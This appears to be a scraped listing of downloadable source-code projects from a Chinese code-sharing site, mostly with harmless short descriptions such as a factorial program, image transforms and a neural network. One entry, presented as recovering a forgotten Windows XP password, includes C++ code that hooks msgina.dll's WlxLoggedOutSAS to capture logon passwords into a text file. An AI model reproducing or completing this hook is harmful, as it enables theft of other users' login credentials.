-
用VC++编写的算3000的阶乘的源程序
用VC++编写的算3000的阶乘的源程序-It is a source programme editted with VC to compute the factorial of 3000.
- 2023-04-06 07:50:03下载
- 积分:1
-
此代码实现了图象的平移,旋转,镜像,转置,缩放等几何变换算法....
此代码实现了图象的平移,旋转,镜像,转置,缩放等几何变换算法.-This program achieves geometrical transform algorithm of images levle-remove,circumrotation,Mirror,transpose,zoom and so on.
- 2022-08-25 01:40:18下载
- 积分:1
-
实现MCAR关联分类规则的挖掘过程,一种数据挖掘算法挖掘规则的过程。希望对大家有帮助...
实现MCAR关联分类规则的挖掘过程,一种数据挖掘算法挖掘规则的过程。希望对大家有帮助-a method of mining class association rules
- 2023-03-21 00:15:03下载
- 积分:1
-
access报表显示类应用
access报表显示类应用-access statements applications
- 2023-05-28 22:00:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
Jinshan drug tyrants like the interface development of small procedures, to demo...
仿金山毒霸的界面开发的小程序,向大家展示了,如何美化程序的手段-Jinshan drug tyrants like the interface development of small procedures, to demonstrate how to beautify a means of procedures
- 2023-09-05 20:35:03下载
- 积分:1
-
在手机上选择上网的方式,根据自己和网络的要求选择
在手机上选择上网的方式,根据自己和网络的要求选择-choices in phone access to the Internet, according to its own requirements and the choice of network
- 2022-03-29 06:35:10下载
- 积分:1
-
BP神经网络
该代码为基于双隐含层BP神经网络的预测,内部包含数据和源代码,同时能够输出预测误差。
- 2023-07-23 05:25:03下载
- 积分:1
-
直式程式码,将小学生除法式变为直式程式码
直式程式码,将小学生除法式变为直式程式码-Straight code division will be primary and secondary school students into Straight-style code. .
- 2022-06-03 14:33:23下载
- 积分:1
-
一本经典的c++入门书籍,非常适合初学者,也可作为以后编程的参考书籍...
一本经典的c++入门书籍,非常适合初学者,也可作为以后编程的参考书籍-A classic c++ Entry books, very suitable for beginners, after the programming can also be used as reference books
- 2023-02-10 07:25:04下载
- 积分:1